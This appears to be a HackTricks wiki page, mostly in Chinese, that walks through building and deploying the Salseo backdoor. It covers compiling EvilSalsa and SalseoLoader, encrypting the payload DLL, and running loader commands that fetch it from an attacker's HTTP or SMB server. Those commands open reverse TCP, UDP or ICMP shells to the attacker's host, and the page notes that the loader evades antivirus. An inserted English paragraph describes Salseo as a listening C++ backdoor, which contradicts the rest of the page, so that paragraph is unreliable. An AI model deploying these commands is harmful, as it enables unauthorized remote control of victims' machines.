hacktricks/backdoors/salseo.md

193 lines
8 KiB
Markdown
Raw Normal View History

2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
2022-04-28 16:01:33 +00:00
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
</details>
2023-08-03 19:12:22 +00:00
## 编译二进制文件
从github下载源代码并编译**EvilSalsa**和**SalseoLoader**。您需要安装**Visual Studio**来编译代码。
为将要使用它们的Windows系统的架构编译这些项目如果Windows支持x64请为该架构进行编译
您可以在Visual Studio中的**左侧"Build"选项卡**中的**"Platform Target"**中**选择架构**。
(\*\*如果找不到这些选项,请点击**"Project Tab"**,然后点击**"\<Project Name> Properties"**)
2022-08-10 14:32:58 +00:00
![](<../.gitbook/assets/image (132).png>)
然后构建这两个项目Build -> Build Solution在日志中将显示可执行文件的路径
2022-09-27 00:14:52 +00:00
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
2023-08-03 19:12:22 +00:00
## 准备后门
首先,您需要对**EvilSalsa.dll**进行编码。您可以使用python脚本**encrypterassembly.py**或编译项目**EncrypterAssembly**来执行此操作:
2022-08-04 20:47:35 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
#### Salseo
Salseo is a backdoor that allows an attacker to maintain access to a compromised system. It is a simple backdoor that listens on a TCP port and executes commands sent by the attacker. The backdoor is written in C++ and compiled with Mingw-w64.
To use Salseo, the attacker needs to execute the backdoor on the target system. Once the backdoor is running, the attacker can connect to it using netcat or any other tool that allows connecting to a TCP port. The attacker can then send commands to the backdoor, which will be executed on the compromised system.
Salseo is a basic backdoor that can be used for educational purposes or as a starting point for more complex backdoors. It is important to note that using backdoors like Salseo on systems without authorization is illegal and unethical.
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
现在你已经拥有执行所有Salseo操作所需的一切**编码的EvilDalsa.dll**和**SalseoLoader的二进制文件。**
**上传SalseoLoader.exe二进制文件到机器上。它们不应该被任何杀毒软件检测到...**
2023-08-03 19:12:22 +00:00
## **执行后门**
### **获取TCP反向shell通过HTTP下载编码的dll**
记得启动一个nc作为反向shell监听器以及一个HTTP服务器来提供编码的evilsalsa。
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **获取UDP反向shell通过SMB下载编码的dll**
记得启动一个nc作为反向shell监听器并启动一个SMB服务器来提供编码的evilsalsaimpacket-smbserver
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
### **获取 ICMP 反向 shell已经在受害者内部编码的 dll**
**这次您需要在客户端上使用一个特殊工具来接收反向 shell。下载** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **禁用 ICMP 回复:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2023-08-03 19:12:22 +00:00
#### 执行客户端:
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### 在受害者内部让我们执行salseo操作
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## 编译 SalseoLoader 作为导出主函数的 DLL
使用 Visual Studio 打开 SalseoLoader 项目。
### 在主函数之前添加:\[DllExport]
![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### 为此项目安装 DllExport
#### **工具** --> **NuGet 包管理器** --> **管理解决方案的 NuGet 包...**
![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
#### **搜索 DllExport 包(使用浏览选项卡),然后按安装(并接受弹出窗口)**
![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
在您的项目文件夹中会出现文件:**DllExport.bat** 和 **DllExport\_Configure.bat**
### **卸载 DllExport**
点击 **卸载**(是的,这很奇怪,但相信我,这是必要的)
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
### **退出 Visual Studio 并执行 DllExport\_configure**
只需 **退出** Visual Studio
然后,转到您的 **SalseoLoader 文件夹****执行 DllExport\_Configure.bat**
选择 **x64**(如果您将在 x64 系统中使用它,这是我的情况),选择 **System.Runtime.InteropServices**(在 **DllExport 的命名空间** 中)并点击 **应用**
![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>)
### **再次使用 Visual Studio 打开项目**
**\[DllExport]** 不应再被标记为错误
![](<../.gitbook/assets/image (8) (1).png>)
### 构建解决方案
选择 **输出类型 = 类库**(项目 --> SalseoLoader 属性 --> 应用程序 --> 输出类型 = 类库)
2022-10-22 15:26:54 +00:00
![](<../.gitbook/assets/image (10) (1).png>)
选择 **x64 平台**(项目 --> SalseoLoader 属性 --> 构建 --> 平台目标 = x64
2022-09-02 15:27:38 +00:00
![](<../.gitbook/assets/image (9) (1) (1).png>)
**构建** 解决方案:构建 --> 构建解决方案(在输出控制台中将显示新 DLL 的路径)
### 测试生成的 Dll
将 Dll 复制粘贴到要测试的位置。
2023-08-03 19:12:22 +00:00
执行:
```
rundll32.exe SalseoLoader.dll,main
```
如果没有出现错误那么你可能有一个功能正常的DLL
## 使用DLL获取shell
不要忘记使用**HTTP服务器**并设置一个**nc监听器**
2022-08-04 20:47:35 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
其他支持HackTricks的方式
2022-04-28 16:01:33 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**]收藏品(https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
</details>